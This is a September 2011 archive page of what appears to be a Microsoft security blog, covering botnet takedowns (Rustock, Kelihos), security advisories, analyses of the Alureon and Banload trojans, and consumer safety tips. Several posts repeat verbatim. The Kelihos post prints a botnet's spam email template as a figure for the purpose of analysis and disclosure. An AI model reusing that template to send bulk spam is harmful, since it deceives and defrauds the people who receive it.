Archive

Archive for September, 2011

Rustock: civil case closed

September 30th, 2011 No comments

Microsoft has officially announced that our civil case against the operators of the Rustock botnet (a major source of spam) has been closed and our teams have turned over the information we’ve gathered to the FBI.

The Rustock botnet is considered one of the largest sources of spam on the Internet and our case is helping to reduce the effects of the botnet and ensure that it will never be used for cybercrime again.

Learn how to clean an infected computer and help protect your PC with botnet protection and avoid malware.

What is the Rustock botnet?

The Rustock botnet is a network of infected computers controlled by cybercriminals and used for spam, fraud, and other cybercrime. The owners of infected computers probably had no idea that their computer was being used to send spam.

What did the Rustock botnet do?

Most of the spam messages generated by the Rustock botnet promoted counterfeit or unapproved generic pharmaceuticals from unlicensed and unregulated online drug sellers.  Rustock spam also used Microsoft’s trademark to promote these drugs. In another scheme, Rustock-generated email lured people into lottery scams in which spammers attempted to convince people that they had won a lottery. The victims were told that they needed to send the spammers money to collect the larger lottery winnings. 

Help protect yourself against these kinds of email and web scams.

Microsoft is offering a $250,000 reward for information that leads to the arrest and conviction of Rustock’s operators. Any tips should be sent directly to the FBI at MS_Referrals@ic.fbi.gov.

More information about the Rustock botnet

Categories: botnet, Microsoft, Rustock, security, spam Tags:

Updated requirements for a Windows Server 2008 R2 domain controller certificate from a 3rd party CA

September 28th, 2011 No comments

Do you use parental controls?

September 27th, 2011 No comments

If you’re a parent, guardian, or a caregiver for kids, parental controls can help you control the content that your kids see on the Internet or on their Xbox. You can use parental controls to help support your own house rules and you can even customize them to fit a child’s age or maturity level.

The Family Online Safety Institute recently released the Parents’ Views of Online Safety study (sponsored by Microsoft) that found just over half of all U.S. parents say they’ve used family safety software to limit or monitor their child’s Internet use.

Compare family safety tools from Microsoft.

Read more.

What’s your experience with parental controls? Tell us about it in a comment below.

Operation b79 (Kelihos) and Additional MSRT September Release

September 27th, 2011 No comments

For the month of September, Microsoft is adding the Win32/Kelihos family to a second release of the Malicious Software Removal Tool. This additional release is to support the most recent action in Project MARS- Operation b79 which targets the Kelihos botnet. Operation b79 builds on the successes of the Rustock and Waledac takedowns. This operation extends previous legal tactics in addition to our various technical measures in that we are, for the first time, naming a defendant in a civil case involving a botnet. The intent of this tactic is sending a strong message to online criminals that accountability still applies on the Internet and that it is our goal to make online crime riskier and more expensive for those involved. You can see more details on the legal aspects of this operation in the blog of our partners in the Microsoft Digital Crimes Unit.

The Win32/Kelihos malware family distributes spam email messages that may contain links to web sites serving installers of Kelihos itself. It may also communicate with remote computers to exchange information that it uses to execute various tasks such as bootstrapping to the botnet, sending spam emails promoting bogus products or services, stealing sensitive information, or downloading and executing arbitrary files.

Figure 1 below shows the monthly reported counts from our telemetry for the Win32/Kelihos family. It made a big bang around the holidays last year by launching a holiday-themed spam campaign that distributed e-cards containing malicious links pointing to servers hosting Kelihos installers. As you can see in the chart, ever since then, it’s been slowly trying to grow in size.

Win32/Kelihos graph 

Figure 1 Win32/Kelihos Detection Reports

We have observed Win32/Kelihos protecting itself by employing several techniques such as server-side polymorphism, encrypted communication (a sample of which is shown in Figure 2), fast-flux, and dynamic reconfiguration. Moreover, it is able to persistently connect to the botnet using an updatable peer list. It is also capable of updating itself so that it can utilize new or improved versions of itself and to perform additional tasks, if there are any.   In our investigation of this botnet’s command and control infrastructure, and as we allege in our complaint, we identified more than 3,700 subdomains being hosted in the Czech Republic by a single hoster. This same hoster had more than 215,000 subdomains hosting malware. In May of 2011, Google temporarily blocked more than 200,000 of these but reinstated the subdomains after the defendant allegedly corrected the problem.

Win32/Kelihos encrypted communication

Figure 2 Encrypted Communication

As a ploy to avoid detection by antivirus or security products, the binaries distributed by Win32/Kelihos are also wrapped in obfuscators that make use of anti-emulation tricks. In addition, Kelihos randomizes the header values of its HTTP request messages to make it harder for NIS/IPS products to catch them. Aside from randomizing the name of the HTM files, Kelihos has also taken to using different values for the User-Agent string of each subsequent message.

Over the past months, Kelihos has launched various spam campaigns promoting scams or dubious products. Using reconfigurable email templates and lists, Kelihos is easily able to update its spam runs. This is why it is also possible for more than one spam campaign to run in the Kelihos botnet at any given time. Figure 3 below shows an example of a spam email template that is being distributed in the Kelihos botnet at the time of writing this blog post:

Received: from unknown (HELO %^C6%^I^%.%^I^%.%^I^%.%^I^%^%) ([%^V6^%])
by %^A^% with ESMTP; %^D%^R20-300^%^%
Message-ID: <%^O%^V6^%:%^R3-50^%^%%^V0^%>
From: “%^Fmynames^% %^Fsurnames^%” <%^Fnames^%@%^Fdomains^%>To: <%^0^%>
Subject: %^Fskli_subj^%
Date: %^D-%^R30-600^%^%
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset=”KOI8-R”;
reply-type=original
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.%^C7%^Foutver.6^%^%
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.%^V7^%

ε╧╫╧╙╘╔ ╔┌ Γ┼╠┴╥╒╙╔:
– ╨╧╠╔╘╔╦┴ ╔ ▄╦╧╬╧═╔╦┴
– ╧┬▌┼╙╘╫╧ ╔ ╦╒╠╪╘╒╥┴
– ┴╦├╔╔ ╔ ┌┴┬┴╙╘╧╫╦╔
– ╞╧╘╧╚╥╧╬╔╦┴
╔ ═╬╧╟╧┼ ─╥╒╟╧┼: %^Fskli_link^%

Figure 3 Spam Email Template

The above template was used to distribute spam containing links to a website of a political activist group in Eastern Europe.

Another payload of Kelihos is to steal sensitive information from the compromised computer. This includes attempting to harvest email addresses, FTP login credentials, and Bitcoin wallets, among other things. Our investigation also revealed that in addition to hosting Kelihos, defendants’ cz.cc domain has previously been investigated for delivering MacDefender, a type of rogue security software which infects Apple’s operating system.

It is interesting to note that the Kelihos botnet shares significant similarities of its code with the Win32/Waledac botnet (Waledac was the target of our first Project MARS action- Operation b49).  These similarities have caused some to refer to Kelihos as “Waledac 2.0”. While similar to Waledac, the Kelihos botnet is more complicated in many ways. In spite of this complexity, we are hopeful that we will disrupt a meaningful portion of the botnet in addition to naming a defendant. Both of these are important steps towards deterring online crime globally.

If you believe a computer under your care may be infected with Kelihos or other malicious software, we recommend that you leverage antivirus software from a software provider you trust. You can find information about Project MARS as well as additional support information at http://support.microsoft.com/botnets.

Categories: MSRT, Win32/Kelihos Tags:

Operation b79 (Kelihos) and Additional MSRT September Release

September 27th, 2011 No comments

For the month of September, Microsoft is adding the Win32/Kelihos family to a second release of the Malicious Software Removal Tool. This additional release is to support the most recent action in Project MARS- Operation b79 which targets the Kelihos botnet. Operation b79 builds on the successes of the Rustock and Waledac takedowns. This operation extends previous legal tactics in addition to our various technical measures in that we are, for the first time, naming a defendant in a civil case involving a botnet. The intent of this tactic is sending a strong message to online criminals that accountability still applies on the Internet and that it is our goal to make online crime riskier and more expensive for those involved. You can see more details on the legal aspects of this operation in the blog of our partners in the Microsoft Digital Crimes Unit.

The Win32/Kelihos malware family distributes spam email messages that may contain links to web sites serving installers of Kelihos itself. It may also communicate with remote computers to exchange information that it uses to execute various tasks such as bootstrapping to the botnet, sending spam emails promoting bogus products or services, stealing sensitive information, or downloading and executing arbitrary files.

Figure 1 below shows the monthly reported counts from our telemetry for the Win32/Kelihos family. It made a big bang around the holidays last year by launching a holiday-themed spam campaign that distributed e-cards containing malicious links pointing to servers hosting Kelihos installers. As you can see in the chart, ever since then, it’s been slowly trying to grow in size.

Win32/Kelihos graph 

Figure 1 Win32/Kelihos Detection Reports

We have observed Win32/Kelihos protecting itself by employing several techniques such as server-side polymorphism, encrypted communication (a sample of which is shown in Figure 2), fast-flux, and dynamic reconfiguration. Moreover, it is able to persistently connect to the botnet using an updatable peer list. It is also capable of updating itself so that it can utilize new or improved versions of itself and to perform additional tasks, if there are any.   In our investigation of this botnet’s command and control infrastructure, and as we allege in our complaint, we identified more than 3,700 subdomains being hosted in the Czech Republic by a single hoster. This same hoster had more than 215,000 subdomains hosting malware. In May of 2011, Google temporarily blocked more than 200,000 of these but reinstated the subdomains after the defendant allegedly corrected the problem.

Win32/Kelihos encrypted communication

Figure 2 Encrypted Communication

As a ploy to avoid detection by antivirus or security products, the binaries distributed by Win32/Kelihos are also wrapped in obfuscators that make use of anti-emulation tricks. In addition, Kelihos randomizes the header values of its HTTP request messages to make it harder for NIS/IPS products to catch them. Aside from randomizing the name of the HTM files, Kelihos has also taken to using different values for the User-Agent string of each subsequent message.

Over the past months, Kelihos has launched various spam campaigns promoting scams or dubious products. Using reconfigurable email templates and lists, Kelihos is easily able to update its spam runs. This is why it is also possible for more than one spam campaign to run in the Kelihos botnet at any given time. Figure 3 below shows an example of a spam email template that is being distributed in the Kelihos botnet at the time of writing this blog post:

Received: from unknown (HELO %^C6%^I^%.%^I^%.%^I^%.%^I^%^%) ([%^V6^%])
by %^A^% with ESMTP; %^D%^R20-300^%^%
Message-ID: <%^O%^V6^%:%^R3-50^%^%%^V0^%>
From: “%^Fmynames^% %^Fsurnames^%” <%^Fnames^%@%^Fdomains^%>To: <%^0^%>
Subject: %^Fskli_subj^%
Date: %^D-%^R30-600^%^%
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset=”KOI8-R”;
reply-type=original
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.%^C7%^Foutver.6^%^%
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.%^V7^%

ε╧╫╧╙╘╔ ╔┌ Γ┼╠┴╥╒╙╔:
– ╨╧╠╔╘╔╦┴ ╔ ▄╦╧╬╧═╔╦┴
– ╧┬▌┼╙╘╫╧ ╔ ╦╒╠╪╘╒╥┴
– ┴╦├╔╔ ╔ ┌┴┬┴╙╘╧╫╦╔
– ╞╧╘╧╚╥╧╬╔╦┴
╔ ═╬╧╟╧┼ ─╥╒╟╧┼: %^Fskli_link^%

Figure 3 Spam Email Template

The above template was used to distribute spam containing links to a website of a political activist group in Eastern Europe.

Another payload of Kelihos is to steal sensitive information from the compromised computer. This includes attempting to harvest email addresses, FTP login credentials, and Bitcoin wallets, among other things. Our investigation also revealed that in addition to hosting Kelihos, defendants’ cz.cc domain has previously been investigated for delivering MacDefender, a type of rogue security software which infects Apple’s operating system.

It is interesting to note that the Kelihos botnet shares significant similarities of its code with the Win32/Waledac botnet (Waledac was the target of our first Project MARS action- Operation b49).  These similarities have caused some to refer to Kelihos as “Waledac 2.0”. While similar to Waledac, the Kelihos botnet is more complicated in many ways. In spite of this complexity, we are hopeful that we will disrupt a meaningful portion of the botnet in addition to naming a defendant. Both of these are important steps towards deterring online crime globally.

If you believe a computer under your care may be infected with Kelihos or other malicious software, we recommend that you leverage antivirus software from a software provider you trust. You can find information about Project MARS as well as additional support information at http://support.microsoft.com/botnets.

Categories: MSRT, Win32/Kelihos Tags:

Microsoft releases Security Advisory 2588513

September 26th, 2011 No comments

Hello. Today we released Security Advisory 2588513, addressing an information-disclosure issue in SSL (Secure Sockets Layer) 3.0 and TLS (Transport Layer Security) 1.0 to provide guidance for customers. This is an industry-wide issue with limited impact that affects the Internet ecosystem as a whole rather than any specific platform. Our Advisory addresses the issue via the Windows operating system.

We are not aware of a way to exploit this issue in other protocols or components, and we have no reports of exploitation in the wild at this time; our investigation continues, but our research so far indicates that customers are at minimal risk. To successfully exploit this issue, the would-be attacker must meet several conditions:

  • The targeted user must be in an active HTTPS session;
  • The malicious code the attacker needs to decrypt the HTTPS traffic must be injected and run in the user’s browser session; and,
  • The attacker’s malicious code must be treated as from the same origin as the HTTPS server in order to it to be allowed to piggyback the existing HTTPS connection.

In addition, due to the fashion in which this man-in-the-middle exploit operates, a would-be attacker would need a fairly high-bandwidth connection to the target.  Later versions of TLS (1.1 and 1.2) are not susceptible to this approach; our Security Advisory gives guidance on how to enable TLS 1.1 and 1.2 for customers who believe themselves to be at significant risk from this issue.

For further information on the nature of the issue, please see “Is SSL broken? – More about Security Advisory 2588513” on the SRD blog.

If you haven’t done so already, we suggest that you register for our security alerts (via email or RSS) on the Microsoft Technical Security Notifications page.

Thanks —
Jerry Bryant
Group Manager, Response Communications
Trustworthy Computing Group

Categories: advisory, Security Advisory Tags:

Microsoft Security Advisory (2588513): Vulnerability in SSL/TLS Could Allow Information Disclosure – Version: 1.0

Revision Note: V1.0 (September 26, 2011): Advisory published.
Summary: Microsoft is aware of detailed information that has been published describing a new method to exploit a vulnerability in SSL 3.0 and TLS 1.0, affecting the Windows operating system. This vulnerability affects the protocol itself and is not specific to the Windows operating system. This is an information disclosure vulnerability that allows the decryption of encrypted SSL/TLS traffic. This vulnerability primarily impacts HTTPS traffic, since the browser is the primary attack vector, and all web traffic served via HTTPS or mixed content HTTP/HTTPS is affected. We are not aware of a way to exploit this vulnerability in other protocols or components and we are not aware of attacks that try to use the reported vulnerability at this time. Considering the attack scenario, this vulnerability is not considered high risk to customers.

Categories: Uncategorized Tags:

A tale of grannies, Chinese herbs, Tom Cruise, Alureon and steganography

September 26th, 2011 No comments

I’ve been monitoring the development of a particular strain of Alureon since the start of August this year. The installer (detected as Trojan:Win32/Alureon.FE – cc9a8000f80b6aecee30375e3277292a725acbfb) is easily distinguishable from more prevalent strains such as Trojan:Win32/Alureon.DX by the use of PE resources to store each component. This particular installer is often downloaded by variants of Trojan:Win32/Fakesysdef using remote file names such as ‘531-direct’.

Whilst investigating one of the components this week, I came across something new: Functionality to download another component with the file name ‘com32‘ had been added. I proceeded to download and decrypt this component. My initial analysis yielded what appeared to be functionality related to cryptography and JPG processing. This intriguing combination piqued my interest, owing in part to a section of the configuration file which I had examined earlier.

I turned my attention to trying to determine the purpose of the URLs hosted on the free blogging sites “LiveJournal” and “WordPress”. The content of each page appeared to be benign, containing numerous and varied JPGs hosted on the free image provider “imageshack.us”. Examining the code responsible for retrieving the pages, I discovered the HTML content was parsed for specific IMG tags.

Alureon would then attempt to retrieve the JPG pointed to by the markup. The raw data, along with a 61-character ASCII string, would then be passed to the ‘com32’ component. The long string had a distinctly password-like appearance.

After further investigation, I was able to determine that embedded within each of the JPGs was a complete configuration file using steganography. One of the critical sections of the configuration file contains the list of command and control servers. The purpose of the publically hosted data was revealed — it’s there to provide a layer of redundancy and defense against existing domains that might become unavailable. In the event that no command and control server could be contacted, Alureon would then seek to retrieve an updated configuration file from these ‘backup’ locations. 

And below is a collage of the images I encountered, in which the configuration file is tucked away — a grandmotherly woman, a bowl of Chinese medicinal herbs, and a fellow who appears to be the star of Top Gun.

Whilst the use of data embedded and obfuscated within JPG files is not a new technique, it is interesting to see Alureon adopt this technique as part of a defensive mechanism.
 

Scott Molenkamp
MMPC Melbourne

Categories: Uncategorized Tags:

Rustock Case Update

September 23rd, 2011 No comments

Today, Microsoft’s Digital Crimes Unit announced that we have concluded our civil case against the Rustock botnet operators and turned evidence found during that investigation over to the FBI as a criminal referral. While the FBI will be driving that investigation, we will continue to offer the $250,000 reward for information which leads to the arrest and conviction of Rustock’s operators. Any leads can be sent to ms_referrals@ic.fbi.gov.

We will continue to work with ISPs and CERTs to clean infected computers utilizing the telemetry we receive from having control of Rustock’s command and control domains. Since the takedown in March, and through this cooperation, the Rustock botnet has declined in volume by almost 75%. You can see more about the overall volume at peak in the special edition of our Security Intelligence Report on Rustock which we released in June.
 
If you believe you may have a computer under your control which is infected with Rustock, you can find support information here: http://support.microsoft.com/contactus/cu_sc_virsec_b107#tab0
 
It is our recommendation that any system infected with Rustock be cleaned with a full antivirus product as our telemetry shows that machines infected with Rustock are generally infected with other malicious software as well.
 
— MMPC, Jeff Williams

Categories: Uncategorized Tags:

Windows 8: Updated security features

September 22nd, 2011 No comments
Categories: security, Windows 8 Tags:

Recover your Hotmail account

September 22nd, 2011 No comments

We recently received this email:

“My Hotmail account was hacked and taken over by the classic ‘I’m in London and I’ve been mugged’ scam. It appears that the hacker has changed the basic verification information on the account and every attempt to reset the password throws me into an endless loop.

How to get my account back?”

It sounds like the author of this email has already tried to reset the password on the account manually. If you’re locked out of your account, the first thing you should always do is attempt to reset your password. Here are a few ways you can do this:

  • On the Windows Live Hotmail website sign-in page, click Forgot your password?
  • Go to the reset your password link.

First, enter your Windows ID. Then, in the Windows Live ID text box, enter the characters you see in the picture, to prove that you’re not a machine.

Next, you’ll see a screen that offers you options to recover your password using an alternate email address or a mobile phone. If you haven’t associated your account with these alternatives, choose customer support.

Banker – the other way around

September 20th, 2011 No comments

There are many techniques used by malware in the banker family to steal user’s authentication credentials for online banking sites. We came across an interesting sample recently, detected as Trojan:Win32/Banload.A, which uses a remote proxy script in order to target online banking sites and facilitate data theft.

When Trojan:Win32/Banload.A is executed, it opens an Internet browser to a certain animation site to trick the user into thinking that it’s nothing but an animation file:

 

 

However, the cute animation masks the main objective of this trojan, which is to modify the web browser settings to use a Proxy Automatic Configuration script… And once set, that’s it! Mission accomplished! This malware’s job is done, for now…

 

 

By using a proxy configuration script, the trojan sets the user’s Internet connection to be routed through a proxy server.
 
Affected users should note that in the case of Trojan:Win32/Banload.A, because it makes changes to the proxy settings, removing the malware will not be enough to fix an affected computer and return it to a pre-compromised state. The configuration settings will need to be fixed manually. Without changing these settings, while the remote script remains available, the affected computer will still be utilizing it. The script effectively moderates the affected user’s Internet use – possibly providing false information and redirecting the user away from sites of their choice to sites of the attacker’s choice – with the affected user being none the wiser.
 
MMPC downloaded the Proxy Script from the URL (shown in the above graphic) and found it to be malicious; we detect it as TrojanProxy:JS/Banker.B. It contains code that monitors for online banking sites visited by the affected user, and redirects traffic to a proxy server that could result in the theft of authentication credentials or other sensitive information.
 

In order to change these proxy settings:
 
1. In Internet Explorer, click the Tools menu, and then click Internet Options.
 
2. Click the Connections tab, and then click LAN Settings.
 
3. In the Automatic configuration area, de-select Use automatic configuration script.
 
4. Click OK.
 

For more information about using automatic proxy configuration, see the following articles:

 

SHA1s:
C3D1E6E68CC5241F92F22C07F120487C0AFB03D4
c93c7823c5ba4fe39a91964c8db08f413262719e
0525cbdce83410586a7707c10aea49e87c3f8a19

 

Jonathan San Jose
MMPC Melbourne

Categories: Uncategorized Tags:

Cumulative non-security update protects from fraudulent certificates

September 19th, 2011 No comments

Today, Microsoft re-released KB2616676 non-security update for customers using Microsoft Windows XP and Windows Server 2003, which addresses an issue described in the “known issues” section of KB2616676.  Customers who have enabled automatic updates are already protected and no further action is required, and others are recommended to download the cumulative version of the KB2616676 to protect themselves from the fraudulent certificates listed in Security Advisory 2607712.

 

Thanks,

Dave Forstrom,

Director, Trustworthy Computing

Categories: Uncategorized Tags:

2607712 – Fraudulent Digital Certificates Could Allow Spoofing – Version: 5.0

Revision Note: V5.0 (September 19, 2011): Revised to announce the rerelease of the KB2616676 update. See the Update FAQ in this advisory for more information.
Summary: Microsoft is aware of active attacks using at least one fraudulent digital certificate issued by DigiNotar, a certification authority present in the Trusted Root Certification Authorities Store. A fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks against all Web browser users including users of Internet Explorer. While this is not a vulnerability in a Microsoft product, this issue affects all supported releases of Microsoft Windows.

Categories: Uncategorized Tags:

Fraudulent Digital Certificates Could Allow Spoofing – Version: 5.0

Revision Note: V5.0 (September 19, 2011): Revised to announce the rerelease of the KB2616676 update. See the Update FAQ in this advisory for more information.
Summary: Microsoft is aware of active attacks using at least one fraudulent digital certificate issued by DigiNotar, a certification authority present in the Trusted Root Certification Authorities Store. A fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks against all Web browser users including users of Internet Explorer. While this is not a vulnerability in a Microsoft product, this issue affects all supported releases of Microsoft Windows.

Categories: Uncategorized Tags:

Microsoft Security Advisory (2607712): Fraudulent Digital Certificates Could Allow Spoofing – Version: 5.0

Severity Rating:
Revision Note: V5.0 (September 19, 2011): Revised to announce the rerelease of the KB2616676 update. See the Update FAQ in this advisory for more information.
Summary: Microsoft is aware of active attacks using at least one fraudulent digital certificate issued by DigiNotar, a certification authority present in the Trusted Root Certification Authorities Store. A fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks against all Web browser users including users of Internet Explorer. While this is not a vulnerability in a Microsoft product, this issue affects all supported releases of Microsoft Windows.

Categories: Uncategorized Tags:

Microsoft Security Advisory (2607712): Fraudulent Digital Certificates Could Allow Spoofing – Version: 5.0

Revision Note: V5.0 (September 19, 2011): Revised to announce the rerelease of the KB2616676 update. See the Update FAQ in this advisory for more information.
Summary: Microsoft is aware of active attacks using at least one fraudulent digital certificate issued by DigiNotar, a certification authority present in the Trusted Root Certification Authorities Store. A fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks against all Web browser users including users of Internet Explorer. While this is not a vulnerability in a Microsoft product, this issue affects all supported releases of Microsoft Windows.

Categories: Uncategorized Tags:

Q&A from the September 2011 Security Bulletin Webcast

September 16th, 2011 No comments

Hello,

Today we published the September Security Bulletin Webcast Questions & Answers page. We fielded 15 questions primarily regarding the Diginotar Certificate compromise and the associated Security Advisory. There was one question that we were unable to answer during the webcast due to time constraints, and we have included all questions and answers on the Q&A page.

We invite our customers to join us for the next public webcast on Wednesday, October 12th at 11 a.m. PDT (-8 UTC), when we will go into detail about the September bulletin release and answer questions live on the air.

Customers can register to attend at the link below:

Date: Wednesday, October 12, 2011
Time: 11:00 a.m. PDT (UTC -8)
Register:
Attendee Registration

Get Microsoft Silverlight

Thanks –

Jerry Bryant

Group Manager, Response Communications
Trustworthy Computing Group

How to patch a TMG array– some thoughts on NLB high availability

September 16th, 2011 No comments

One of the reasons for using an array is the availability of NLB, which is known to provide fault tolerance and load balancing.

NLB relies on heartbeats to determine whether the cluster nodes are alive. The nodes divide the potential client IP addresses among each other (in fact actually the hashes of the IPs) and send each other heartbeats, thereby notifying the other members that they are up and running.

As soon as a node is down (fails to send the heartbeats), the remaining nodes take ownership over the failing node’s IP hashes, providing coverage for all the clients normally served by the broken node.

How does this all relate to patching?

For new connections, the above behavior is straightforward, but what if we just “unplug” one of our TMG machines? What happens to existing connections served by this box? No other node will be aware of the state of these connections, so essentially they will simply fail.

This is exactly what happens if you just all of a sudden patch and reboot one of your TMG nodes.

How can we circumvent this? Is there any workaround?

In general, NLB supports what is called “drain mode”.

When your “drainstop” a node, NLB will still serve existing connections owned by that node but it won’t accept new connections. New connections will be handled by the other available nodes in the array.

With that, If you are intentionally taking a node offline then you can use drainsstopping to service all the active connections before you take the node offline for patching.

Therefore, when patching a particular TMG node, Ideally you will :

1. drain the node, wait until the session count drops to zero (sessions tab)

2. suspend it (so that NLB won’t be automatically started on next reboot)

3. patch the node

4. make sure the system operates properly with the patch

5. start NLB again to make the node join the array again

Here is a screenshot of the NLB options available in the TMG Management console:

clip_image001

Reference:

http://technet.microsoft.com/en-us/library/cc725691.aspx

Authors
Balint Toth
Support Escalation Engineer
Microsoft CSS Forefront Edge Team

Technical Reviewer
Eric Detoc
Escalation Engineer
Microsoft CSS Forefront Edge Team

Categories: Uncategorized Tags:

Remove personal files from your PC

September 15th, 2011 No comments

Last month, we told you how to recycle an old PC more safely. We suggested that you use an authorized refurbisher or disk-cleaning software to make sure that all of your personal information was removed from your computer before you gave it away.

Since we posted that information, we’ve received some feedback asking us to go into more detail about how you can remove this information yourself.

Empty your recycle bin. It’s not enough to delete files and send them to your computer’s recycle bin. You also have to empty the bin. To do this, right click the Recycle Bin on your desktop and point to Empty Recycle Bin.  This sounds pretty basic, but easy to forget.

Delete documents that might contain sensitive or personal information. Do you keep a password file on your computer? How about tax or other financial records? Delete these and other personal documents before you give away your computer. Then empty your recycle bin…again.

Delete your Internet browser’s cache cookies, and history. If some websites have saved your password so you can log in quickly, make sure you delete it from all of those websites, so a hacker can’t do the same. Learn how to delete your browsing history in Internet Explorer. And then empty your recycle bin again. It’s fun!

It’s not enough just to empty the recycling bin. What? But you’ve gotten so good at it. The truth is that when you empty your recycle bin you protect your personal information from inexperienced data thieves. The most expert hackers, however, know how easy it is to recover information, even when it’s been deleted from a recycling bin. To be safe, use software that overwrites your information with random ones and zeros.  You can get some recommendations for free and inexpensive software in this article, about how to protect and purge your personal files.

More information about how to prevent fraud.